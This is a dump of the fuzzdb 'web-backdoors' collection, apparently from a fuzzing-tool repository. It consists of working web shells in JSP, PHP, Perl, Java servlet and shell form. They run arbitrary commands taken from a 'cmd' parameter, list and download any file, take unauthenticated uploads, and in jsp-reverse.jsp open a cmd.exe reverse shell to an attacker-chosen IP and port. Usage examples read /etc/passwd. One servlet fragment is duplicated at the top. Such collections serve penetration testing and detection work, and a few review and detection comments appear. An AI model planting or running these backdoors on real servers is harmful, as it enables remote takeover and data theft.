    "); 23 | out.print(""); 24 | } 25 | 26 | 27 | public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 28 | String tag = new String(); 29 | int c = '\0'; 30 | int contador = 0; 31 | ServletInputStream in = req.getInputStream(); 32 | DataInputStream post = new DataInputStream(in); 33 | 34 | PrintWriter out = res.getWriter(); 35 | res.setContentType("text/html"); 36 | out.print("
    ");
    37 | 		// Read the first line of the request body into tag, counting its bytes in contador (presumably the multipart boundary line; confirm against the upload form).
    38 | 		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
    39 | 			tag=tag.concat("" + (char)c);
    40 | 			contador++;
    41 | 			}
    42 | 		// Consume input up to four '\n' bytes (or end of stream), adding every other byte read to contador; presumably this skips the part headers ahead of the payload.
    43 | 		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
    44 | 
    45 | 		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
    46 | 		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
    47 | 
    48 | 		// (!) Uploaded File Name
    49 | 		// Review note: the destination is this hard-coded path; the file name sent by the client is never parsed.
    50 | 		File newfile = new File("c:\\install.log");
    51 | 
    52 | 		/////////////////////////
    53 | 
    54 | 		FileOutputStream fileout = new FileOutputStream(newfile);
    55 | 		// Number of bytes copied = Content-Length minus tag.length(), contador and a fixed 11; the copy is done one byte per iteration.
    56 | 		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
    57 | 			c=post.read();
    58 | 			fileout.write((char)c);
    59 | 			}
    60 | 
    61 | 		fileout.close();
    62 | 		out.print("<== OK");
    63 | 		// Review note: no statement in doPost checks who the caller is, so the file is written for any client that can reach the servlet, under the container's account.
    64 |     }
    65 | 
    66 |     // Identification string reported for this servlet.
    67 |     public String getServletInfo() {
    68 | 		return "UpServlet 0.1";
    69 |     }
    70 | 
    71 | }
    
    
    --------------------------------------------------------------------------------
    /fuzzdb/web-backdoors/jsp/cmd.jsp:
    --------------------------------------------------------------------------------
     1 | <%@ page import="java.util.*,java.io.*"%>
     2 | <%
     3 | //
     4 | // JSP_KIT
     5 | //
     6 | // cmd.jsp = Command Execution (unix)
     7 | //
     8 | // by: Unknown
     9 | // modified: 27/06/2003
    10 | //
    11 | %>
    12 | 
    13 | 
    14 | 15 | 16 |
    17 |
    18 | <%
    19 | if (request.getParameter("cmd") != null) {
    20 |         out.println("Command: " + request.getParameter("cmd") + "
    "); 21 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); 22 | OutputStream os = p.getOutputStream(); 23 | InputStream in = p.getInputStream(); 24 | DataInputStream dis = new DataInputStream(in); 25 | String disr = dis.readLine(); 26 | while ( disr != null ) { 27 | out.println(disr); 28 | disr = dis.readLine(); 29 | } 30 | } 31 | %> 32 |
    33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/cmdjsp.jsp: -------------------------------------------------------------------------------- 1 | // note that linux = cmd and windows = "cmd.exe /c + cmd" 2 | 3 |
    4 | 5 | 6 |
    7 | 8 | <%@ page import="java.io.*" %> 9 | <% 10 | String cmd = request.getParameter("cmd"); 11 | String output = ""; 12 | 13 | if(cmd != null) { 14 | String s = null; 15 | try { 16 | Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); 17 | BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); 18 | while((s = sI.readLine()) != null) { 19 | output += s; 20 | } 21 | } 22 | catch(IOException e) { 23 | e.printStackTrace(); 24 | } 25 | } 26 | %> 27 | 28 |
    29 | <%=output %>
    30 | 
    31 | 32 | 33 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/jsp-reverse.jsp: -------------------------------------------------------------------------------- 1 | // backdoor.jsp 2 | // http://www.security.org.sg/code/jspreverse.html 3 | 4 | <%@ 5 | page import="java.lang.*, java.util.*, java.io.*, java.net.*" 6 | % > 7 | <%! 8 | static class StreamConnector extends Thread 9 | { 10 | InputStream is; 11 | OutputStream os; 12 | 13 | StreamConnector(InputStream is, OutputStream os) 14 | { 15 | this.is = is; 16 | this.os = os; 17 | } 18 | 19 | public void run() 20 | { 21 | BufferedReader isr = null; 22 | BufferedWriter osw = null; 23 | 24 | try 25 | { 26 | isr = new BufferedReader(new InputStreamReader(is)); 27 | osw = new BufferedWriter(new OutputStreamWriter(os)); 28 | 29 | char buffer[] = new char[8192]; 30 | int lenRead; 31 | 32 | while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) 33 | { 34 | osw.write(buffer, 0, lenRead); 35 | osw.flush(); 36 | } 37 | } 38 | catch (Exception ioe) 39 | 40 | try 41 | { 42 | if(isr != null) isr.close(); 43 | if(osw != null) osw.close(); 44 | } 45 | catch (Exception ioe) 46 | } 47 | } 48 | %> 49 | 50 |

    JSP Backdoor Reverse Shell

    51 | 52 |
    53 | IP Address 54 | 55 | Port 56 | 57 | 58 |
    59 |

    60 |


    61 | 62 | <% 63 | String ipAddress = request.getParameter("ipaddress"); 64 | String ipPort = request.getParameter("port"); 65 | 66 | if(ipAddress != null && ipPort != null) 67 | { 68 | Socket sock = null; 69 | try 70 | { 71 | sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); 72 | 73 | Runtime rt = Runtime.getRuntime(); 74 | Process proc = rt.exec("cmd.exe"); 75 | 76 | StreamConnector outputConnector = 77 | new StreamConnector(proc.getInputStream(), 78 | sock.getOutputStream()); 79 | 80 | StreamConnector inputConnector = 81 | new StreamConnector(sock.getInputStream(), 82 | proc.getOutputStream()); 83 | 84 | outputConnector.start(); 85 | inputConnector.start(); 86 | } 87 | catch(Exception e) 88 | } 89 | %> 90 | 91 | 92 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/laudanum/cmd.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/jsp/laudanum/cmd.war -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/laudanum/makewar.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | jar -cvf cmd.war warfiles/* 4 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/laudanum/warfiles/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Created-By: 1.6.0_10 (Sun Microsystems Inc.) 
3 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/laudanum/warfiles/WEB-INF/web.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | Command 9 | /cmd.jsp 10 | 11 | 12 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/laudanum/warfiles/cmd.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> 2 | <% 3 | 4 | if (request.getRemoteAddr() != "4.4.4.4") { 5 | response.sendError(HttpServletResponse.SC_NOT_FOUND) 6 | return; 7 | } 8 | 9 | %> 10 | 11 | Laudanum JSP Shell 12 | 13 | Commands with JSP 14 |
    15 | 16 |
    17 | If you use this against a Windows box you may need to prefix your command with cmd.exe /c 18 |
    19 |
    20 | <%
    21 | if (request.getParameter("cmd") != null) {
    22 | out.println("Command: " + request.getParameter("cmd") + "
    "); 23 | Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); 24 | OutputStream os = p.getOutputStream(); 25 | InputStream in = p.getInputStream(); 26 | DataInputStream dis = new DataInputStream(in); 27 | String disr = dis.readLine(); 28 | while ( disr != null ) { 29 | out.println(disr); 30 | disr = dis.readLine(); 31 | } 32 | } 33 | %> 34 |
    35 |
    36 |
    37 | Copyright © 2014, Kevin Johnson and the Laudanum team.
    38 | Written by Tim Medin.
    39 | Get the latest version at laudanum.secureideas.net. 40 |
    41 | 42 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/list.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> 2 | <% 3 | // 4 | // JSP_KIT 5 | // 6 | // list.jsp = Directory & File View 7 | // 8 | // by: Sierra 9 | // modified: 27/06/2003 10 | // 11 | %> 12 | <% 13 | if(request.getParameter("file")==null) { 14 | %> 15 | 16 |
    17 | 18 | 19 |
    20 | <% 21 | } 22 | %> 23 | <% //read the file name. 24 | try { 25 | File f = new File(request.getParameter("file")); 26 | if(f.isDirectory()) { 27 | int i; 28 | String fname = new String("Unknown"); 29 | String fcolor = new String("Black"); 30 | %> 31 | 32 | 33 | <% 34 | out.print("Path: " + f.toString() + "

    "); 35 | File flist[] = f.listFiles(); 36 | for(i=0; i" + fname.toString() + " " + "( Size: " + flist[i].length() + " bytes)
    \n"); 53 | } 54 | %> 55 |
    56 | <% 57 | 58 | } else { 59 | if(f.canRead() == true) { 60 | InputStream in = new FileInputStream(f); 61 | ServletOutputStream outs = response.getOutputStream(); 62 | int left = 0; 63 | try { 64 | while((left) >= 0 ) { 65 | left = in.read(); 66 | outs.write(left); 67 | } 68 | } catch(IOException ex) {ex.printStackTrace();} 69 | outs.flush(); 70 | outs.close(); 71 | in.close(); 72 | } else { 73 | out.print("Can't Read file
    "); 74 | } 75 | } 76 | } catch(Exception ex) {ex.printStackTrace();} 77 | %> -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/simple.jsp: -------------------------------------------------------------------------------- 1 | <% 2 | Runtime.getruntime().exec(request.getParameter("cmd")) 3 | %> 4 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/win32/cmd_win32.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*,java.net.*"%> 2 | <% 3 | // 4 | // JSP_KIT 5 | // 6 | // cmd.jsp = Command Execution (win32) 7 | // 8 | // by: Unknown 9 | // modified: 27/06/2003 10 | // 11 | %> 12 | 13 |
    14 | 15 | 16 |
    17 |
    18 | <%
    19 | if (request.getParameter("cmd") != null) {
    20 |         out.println("Command: " + request.getParameter("cmd") + "\n
    "); 21 | Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd")); 22 | OutputStream os = p.getOutputStream(); 23 | InputStream in = p.getInputStream(); 24 | DataInputStream dis = new DataInputStream(in); 25 | String disr = dis.readLine(); 26 | while ( disr != null ) { 27 | out.println(disr); disr = dis.readLine(); } 28 | } 29 | %> 30 |
    31 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/php/cmd.php: -------------------------------------------------------------------------------- 1 | 11 | 12 |
    13 | 14 | 15 |
    16 |
    17 | 
    22 | 
    23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/php/list.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | " . $filename . "
    "; 23 | } 24 | closedir($handle); 25 | } else { 26 | echo "FILE: " . $fichero . "

    ";
    27 |   $fp = fopen($fichero, "r");
    28 |   $buffer = fread($fp, filesize($fichero));
    29 |   echo $buffer;
    30 |   fclose($fp);
    31 |   }
    32 | 
    33 | ?>
    
    
    --------------------------------------------------------------------------------
    /fuzzdb/web-backdoors/php/simple-backdoor.php:
    --------------------------------------------------------------------------------
     1 | 
     2 | 
     3 | ";
     7 |         $cmd = ($_REQUEST['cmd']);
     8 |         system($cmd);
     9 |         echo "
    "; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 16 | 17 | 18 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/php/tiny.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/php/up.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 |
    15 | 16 |

    Local File: 17 |

    Remote File: 18 | 19 |




    20 | 21 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/pl-cgi/cmd.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # PerlKit-0.1 - http://www.t0s.org 4 | # 5 | # cmd.pl: Run commands on a webserver 6 | 7 | use strict; 8 | 9 | my ($cmd, %FORM); 10 | 11 | $|=1; 12 | 13 | print "Content-Type: text/html\r\n"; 14 | print "\r\n"; 15 | 16 | # Get parameters 17 | 18 | %FORM = parse_parameters($ENV{'QUERY_STRING'}); 19 | 20 | if(defined $FORM{'cmd'}) { 21 | $cmd = $FORM{'cmd'}; 22 | } 23 | 24 | print ' 25 | 26 |
    27 | 28 | 29 |
    30 |
    ';
    31 | # Review note: $cmd is the URL-decoded "cmd" field of QUERY_STRING; it is echoed into the page and handed to a shell with no filtering and no caller check anywhere in this script.
    32 | if(defined $FORM{'cmd'}) {
    33 |   print "Results of '$cmd' execution:\n\n";
    34 |   print "-"x80;
    35 |   print "\n";
    36 | # Pipe open: the string runs in a subshell with stderr merged into stdout.
    37 |   open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
    38 | # Relay the command output to the response line by line (the filehandle in the loop condition appears to have been stripped from this listing).
    39 |   while() {
    40 |     print;
    41 |   }
    42 | 
    43 |   close(CMD);
    44 |   print "-"x80;
    45 |   print "\n";
    46 | }
    47 | 
    48 | print "
    "; 49 | 50 | sub parse_parameters ($) { 51 | my %ret; 52 | 53 | my $input = shift; 54 | 55 | foreach my $pair (split('&', $input)) { 56 | my ($var, $value) = split('=', $pair, 2); 57 | 58 | if($var) { 59 | $value =~ s/\+/ /g ; 60 | $value =~ s/%(..)/pack('c',hex($1))/eg; 61 | 62 | $ret{$var} = $value; 63 | } 64 | } 65 | 66 | return %ret; 67 | } 68 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/pl-cgi/list.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # 3 | # PerlKit-0.1 - http://www.t0s.org 4 | # 5 | # browse.pl: Browse and download files from a webserver 6 | 7 | use strict; 8 | 9 | my ($path, %FORM); 10 | 11 | $|=1; 12 | 13 | 14 | # Get parameters 15 | 16 | %FORM = parse_parameters($ENV{'QUERY_STRING'}); 17 | 18 | if(defined $FORM{'path'}) { 19 | $path = $FORM{'path'}; 20 | 21 | 22 | } else { 23 | $path = "/"; 24 | } 25 | 26 | if(-f $path) { # Download selected file 27 | print "Content-Type: application/octet-stream\r\n"; 28 | print "\r\n"; 29 | open(FILE, "< $path") || print "Could not open file\n"; 30 | 31 | while() { 32 | print; 33 | } 34 | 35 | close(FILE); 36 | exit; 37 | } 38 | 39 | print "Content-Type: text/html\r\n"; 40 | print "\r\n"; 41 | 42 | print ' 43 | 44 |
    45 | 46 | 47 |
    48 | Directory ' . $path . ' contents: 49 |

    50 | 51 | '; 52 | 53 | if(defined $FORM{'path'}) { 54 | 55 | opendir(DIR, $path) || print "Could not open directory"; 56 | 57 | foreach (sort(readdir(DIR))) { 58 | print get_fileinfo($path, $_). "\n"; 59 | } 60 | 61 | closedir(DIR); 62 | 63 | } 64 | 65 | print "
    "; 66 | 67 | sub parse_parameters ($) { 68 | my %ret; 69 | 70 | my $input = shift; 71 | 72 | foreach my $pair (split('&', $input)) { 73 | my ($var, $value) = split('=', $pair, 2); 74 | 75 | if($var) { 76 | $value =~ s/\+/ /g ; 77 | $value =~ s/%(..)/pack('c',hex($1))/eg; 78 | 79 | $ret{$var} = $value; 80 | } 81 | } 82 | 83 | return %ret; 84 | } 85 | 86 | sub get_fileinfo ($$) { 87 | my $ret; 88 | 89 | my ($dir,$filename) = @_; 90 | my $file = $dir . "/" . $filename; 91 | 92 | $file=~s/\/+/\//g; 93 | 94 | $ret = ""; 95 | 96 | $ret .= ""; 97 | 98 | if(-d $file) { 99 | $file=~s/\/[^\/]+\/\.\./\//g; 100 | $ret .= "$filename"; 101 | } else { 102 | $ret .= "$filename [D]" ; 103 | } 104 | $ret .= ""; 105 | 106 | my ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size, $atime,$mtime,$ctime,$blksize,$blocks) = stat($file); 107 | 108 | $ret .= " "; 109 | $ret .= "$size"; 110 | $ret .= "". getpwuid($uid) .""; 111 | $ret .= "". getgrgid($gid) .""; 112 | 113 | $ret .= ""; 114 | 115 | return $ret; 116 | } 117 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/pl-cgi/perlcmd.cgi: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | use strict; 4 | 5 | print "Cache-Control: no-cache\n"; 6 | print "Content-type: text/html\n\n"; 7 | 8 | my $req = $ENV{QUERY_STRING}; 9 | chomp ($req); 10 | $req =~ s/%20/ /g; 11 | $req =~ s/%3b/;/g; 12 | 13 | print ""; 14 | 15 | print ''; 16 | 17 | if (!$req) { 18 | print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd"; 19 | } 20 | else { 21 | print "Executing: $req"; 22 | } 23 | 24 | print "

    ";
    25 | 	my @cmd = `$req`;
    26 | 	print "
    "; 27 | 28 | foreach my $line (@cmd) { 29 | print $line . "
    "; 30 | } 31 | 32 | print ""; 33 | 34 | # 35 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/servlet/CmdServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * CmdServlet.java 20/01/2004 3 | * 4 | * @author The Dark Raver 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.*; 10 | import javax.servlet.http.*; 11 | 12 | 13 | public class CmdServlet extends HttpServlet { 14 | 15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 16 | res.setContentType("text/html"); 17 | 18 | PrintWriter out = res.getWriter(); 19 | out.print(""); 20 | out.print("

    "); 21 | out.print(""); 22 | out.print(""); 23 | out.print("
    "); 24 | 25 | if(req.getParameter("cmd") != null) { 26 | out.print("\n

    Command: " + req.getParameter("cmd") + "\n


    \n");
    27 | 	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd")); // Review note: the raw "cmd" request parameter is appended to "cmd /c " and executed; doGet shows no caller check or input filtering
    28 | 	        DataInputStream procIn = new DataInputStream(p.getInputStream()); // only the child's stdout is read; stderr is not collected here
    29 | 			int c='\0';
    30 |         	while ((c=procIn.read()) != -1) { // echo the child's output into the HTTP response one byte at a time
    31 | 				out.print((char)c);
    32 | 				}
    33 | 	        }
    34 | 		// Detection note: at runtime this shows up as the servlet container's JVM spawning a command interpreter, typically alongside GET requests carrying a "cmd" parameter in the access log.
    35 | 		out.print("\n
    "); 36 | out.print(""); 37 | } 38 | 39 | public String getServletInfo() { 40 | return "CmdServlet 0.1"; 41 | } 42 | 43 | } 44 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/servlet/ListServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * ListServlet.java 3 | * 4 | * @author Sierra 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.ServletException; 10 | import javax.servlet.http.*; 11 | 12 | public class ListServlet extends HttpServlet 13 | { 14 | 15 | 16 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 17 | PrintWriter printwriter = res.getWriter(); 18 | String path = req.getParameter("file"); 19 | 20 | printwriter.write("\n\nDirectory Listing\n\n\n"); 21 | printwriter.write("\n"); 22 | if(req.getParameter("file")==null) path = "c:\\"; 23 | printwriter.write("

    Path: " + path + "


    \n");
    24 | 		// Review note: path is the raw "file" request parameter (or the drive root when it is absent); the visible code applies no canonicalisation or base-directory restriction before building the File.
    25 | 		File file = new File(path);
    26 | 		// A directory is enumerated entry by entry; any other readable path is streamed back to the client further down in this method.
    27 | 		if(file.isDirectory())
    28 | 		{
    29 | 			String s = new String("Unknown");
    30 | 			String s2 = new String("Black");
    31 | 			File afile[] = file.listFiles();
    32 | 			for(int i = 0; i < afile.length; i++)
    33 | 			{
    34 | 				String s1 = new String(afile[i].toString()); // path string of the entry as File.toString() reports it
    35 | 				printwriter.write("("); // each entry is prefixed with a three-character flag group: type, readable, writable
    36 | 				String s3;
    37 | 				if(afile[i].isDirectory()) // type flag: "d" directory, "-" regular file, "?" anything else
    38 | 				{
    39 | 					printwriter.write("d");
    40 | 					s1 = s1 + "/";
    41 | 					s3 = new String("Blue");
    42 | 				} else
    43 | 				if(afile[i].isFile())
    44 | 				{
    45 | 					printwriter.write("-");
    46 | 					s3 = new String("Green");
    47 | 				} else
    48 | 				{
    49 | 					printwriter.write("?");
    50 | 					s3 = new String("Red");
    51 | 				}
    52 | 				if(afile[i].canRead()) // "r"/"w" report what the servlet container's own account may do with the entry
    53 | 					printwriter.write("r");
    54 | 				else
    55 | 					printwriter.write("-");
    56 | 				if(afile[i].canWrite())
    57 | 					printwriter.write("w");
    58 | 				else
    59 | 					printwriter.write("-");
    60 | 				printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
    \n"); 61 | } 62 | 63 | printwriter.write("
    "); 64 | } else 65 | if(file.canRead()) 66 | { 67 | FileInputStream fileinputstream = new FileInputStream(file); 68 | int j = 0; 69 | while(j >= 0) 70 | { 71 | j = fileinputstream.read(); 72 | printwriter.write(j); 73 | } 74 | fileinputstream.close(); 75 | } else 76 | { 77 | printwriter.write("Can't Read file
    "); 78 | } 79 | 80 | } 81 | 82 | 83 | public String getServletInfo() { 84 | return "Directory Listing"; 85 | } 86 | } -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/servlet/UpServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * UpServlet.java 29/04/2005 3 | * 4 | * @author The Dark Raver 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.*; 10 | import javax.servlet.http.*; 11 | 12 | 13 | public class UpServlet extends HttpServlet { 14 | 15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 16 | res.setContentType("text/html"); 17 | PrintWriter out = res.getWriter(); 18 | out.print(""); 19 | out.print("
    "); 20 | out.print("UPLOAD "); 21 | out.print(""); 22 | out.print("
    "); 23 | out.print(""); 24 | } 25 | 26 | 27 | public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 28 | String tag = new String(); 29 | int c = '\0'; 30 | int contador = 0; 31 | ServletInputStream in = req.getInputStream(); 32 | DataInputStream post = new DataInputStream(in); 33 | 34 | PrintWriter out = res.getWriter(); 35 | res.setContentType("text/html"); 36 | out.print("
    ");
    37 | 		// Read the first line of the request body into tag, counting its bytes in contador (presumably the multipart boundary line; confirm against the upload form).
    38 | 		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
    39 | 			tag=tag.concat("" + (char)c);
    40 | 			contador++;
    41 | 			}
    42 | 		// Consume input up to four '\n' bytes (or end of stream), adding every other byte read to contador; presumably this skips the part headers ahead of the payload.
    43 | 		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
    44 | 
    45 | 		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
    46 | 		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
    47 | 
    48 | 		// (!) Uploaded File Name
    49 | 		// Review note: the destination is this hard-coded path; the file name sent by the client is never parsed.
    50 | 		File newfile = new File("c:\\install.log");
    51 | 
    52 | 		/////////////////////////
    53 | 
    54 | 		FileOutputStream fileout = new FileOutputStream(newfile);
    55 | 		// Number of bytes copied = Content-Length minus tag.length(), contador and a fixed 11; the copy is done one byte per iteration.
    56 | 		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
    57 | 			c=post.read();
    58 | 			fileout.write((char)c);
    59 | 			}
    60 | 
    61 | 		fileout.close();
    62 | 		out.print("<== OK");
    63 | 		// Review note: no statement in doPost checks who the caller is, so the file is written for any client that can reach the servlet, under the container's account.
    64 |     }
    65 | 
    66 |     // Identification string reported for this servlet.
    67 |     public String getServletInfo() {
    68 | 		return "UpServlet 0.1";
    69 |     }
    70 | 
    71 | }
    
    
    --------------------------------------------------------------------------------
    /fuzzdb/web-backdoors/sh/cmd.sh:
    --------------------------------------------------------------------------------
    https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/sh/cmd.sh
    
    
    --------------------------------------------------------------------------------
    /fuzzdb/web-backdoors/sh/list.sh:
    --------------------------------------------------------------------------------
     1 | #!/bin/sh
     2 | #
     3 | # SH_KIT
     4 | #
     5 | # list.sh = Directory & File Listing
     6 | #
     7 | # by: The Dark Raver
     8 | # modified: 16/12/2005
     9 | #
    10 | 
    11 | echo Content-Type: text/html
    12 | echo
    13 | 
    14 | if [ "$QUERY_STRING" != "" ]
    15 |   then
    16 |   echo PATH: $QUERY_STRING "

    " 17 | echo `ls $QUERY_STRING` > /tmp/test 18 | else 19 | echo PATH: / "

    " 20 | echo > /tmp/test 21 | QUERY_STRING="/" 22 | root="1" 23 | fi 24 | 25 | out=`grep "/" /tmp/test` 26 | 27 | if [ "$out" != "" ] 28 | then 29 | echo FICHERO: $QUERY_STRING 30 | echo "
    "
    31 |     cat $QUERY_STRING
    32 |   else
    33 |     if [ "$root" != "1" ]
    34 |       then
    35 |       echo "( ) ".."
    " 36 | fi 37 | for i in `ls $QUERY_STRING` 38 | do 39 | if [ "$root" == "1" ] 40 | then 41 | echo "( ) "$i"
    " 42 | else 43 | echo "( ) "$i"
    " 44 | fi 45 | done 46 | 47 | fi -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/sh/up.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # BETA1 - upload to /tmp/upload 4 | # 5 | # SH_KIT 6 | # 7 | # up.sh = File Upload 8 | # 9 | # by: The Dark Raver 10 | # modified: 16/12/2005 11 | # 12 | 13 | echo Content-Type: text/html 14 | echo 15 | 16 | echo "" 17 | echo "
    " 18 | echo "

    Local File: " 19 | echo "" 20 | echo "




    " 21 | 22 | echo "
    " 23 | 24 | dd count=$CONTENT_LENGTH bs=1 of=/tmp/test 25 | 26 | lineas=`cat /tmp/test | wc -l` 27 | #echo LIN: $lineas 28 | lineas2=`expr $lineas - 4` 29 | #echo LIN2: $lineas2 30 | lineas3=`expr $lineas2 - 1` 31 | #echo LIN3: $lineas3 32 | 33 | #echo "
    " 34 | 35 | tail -$lineas2 /tmp/test > /tmp/test2 36 | head -$lineas3 /tmp/test2 > /tmp/upload 37 | #rm /tmp/test 38 | #rm /tmp/test2 39 | 40 | echo "
    "
    41 | cat /tmp/upload
    42 | echo "
    " 43 | 44 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/wordpress/templates/README.md: -------------------------------------------------------------------------------- 1 | . 2 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/wordpress/templates/ipcheck.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides a rudamentary IP filter to help prevent usage of Laudanum tools 20 | *** by someone other than the person who uploaded Laudanum. This file should be included 21 | *** in other Laudanum tools and not called directly. 22 | *** Written by Jason Gillam 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details. 34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 
39 | *** 40 | ***************************************************************************** */ 41 | 42 | 43 | // ***************** Config entries below *********************** 44 | // IPs are enterable as individual addresses TODO: add CIDR support 45 | $wpl_allowedIPs = array("192.168.0.2", "127.0.0.1", "172.16.179.1"); 46 | 47 | 48 | # *********** No editable content below this line ************** 49 | 50 | $wpl_allowed = 0; 51 | foreach ($wpl_allowedIPs as $IP) { 52 | if ($_SERVER["REMOTE_ADDR"] == $IP) 53 | $wpl_allowed = 1; 54 | } 55 | 56 | if ($wpl_allowed == 0) { 57 | header("HTTP/1.0 404 Not Found"); 58 | die(); 59 | } 60 | 61 | ?> -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/wordpress/templates/settings.php: -------------------------------------------------------------------------------- 1 | 13 | *** Tim Medin 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides a convenient menu of Laudanum tools from a Word Press settings 20 | *** page. 21 | *** 22 | *** Written by Jason Gillam 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details. 
34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 39 | *** 40 | ***************************************************************************** */ 41 | ?> 42 | 43 | 44 |
    45 |

    Laudanum Tools

